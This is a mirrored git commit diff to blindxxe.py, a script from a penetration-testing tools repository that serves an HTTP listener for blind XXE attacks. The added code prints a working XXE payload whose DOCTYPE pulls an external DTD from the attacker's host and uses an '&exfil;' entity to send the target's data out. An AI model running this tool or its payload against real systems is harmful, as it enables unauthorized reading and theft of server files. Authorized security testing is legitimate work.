mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-11-25 03:51:37 +01:00
Improved blindxxe.py script (3)
This commit is contained in:
parent
91851b54cc
commit
084d179e71
@ -145,7 +145,6 @@ def fetchRhost():
|
||||
global config
|
||||
config['rhost'] = socket.gethostbyname(socket.gethostname())
|
||||
|
||||
print('[>] RHOST set to: {}'.format(config['rhost']))
|
||||
|
||||
def main(argv):
|
||||
global config
|
||||
@ -160,6 +159,16 @@ def main(argv):
|
||||
print('[+] Serving HTTP server on: ("{}", {})'.format(
|
||||
config['listen'], config['port']
|
||||
))
|
||||
print('[+] RHOST set to: {}'.format(config['rhost']))
|
||||
|
||||
print('\n[>] Here, use the following XML to leverage Blind XXE vulnerability:')
|
||||
print('''
|
||||
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE foo SYSTEM "http://{}/test.dtd">
|
||||
<foo>&exfil;</foo>
|
||||
|
||||
'''.format(config['rhost']))
|
||||
|
||||
server = HTTPServer((config['listen'], config['port']), BlindXXEServer)
|
||||
thread = threading.Thread(target=server.serve_forever)
|
||||
|
Loading…
Reference in New Issue
Block a user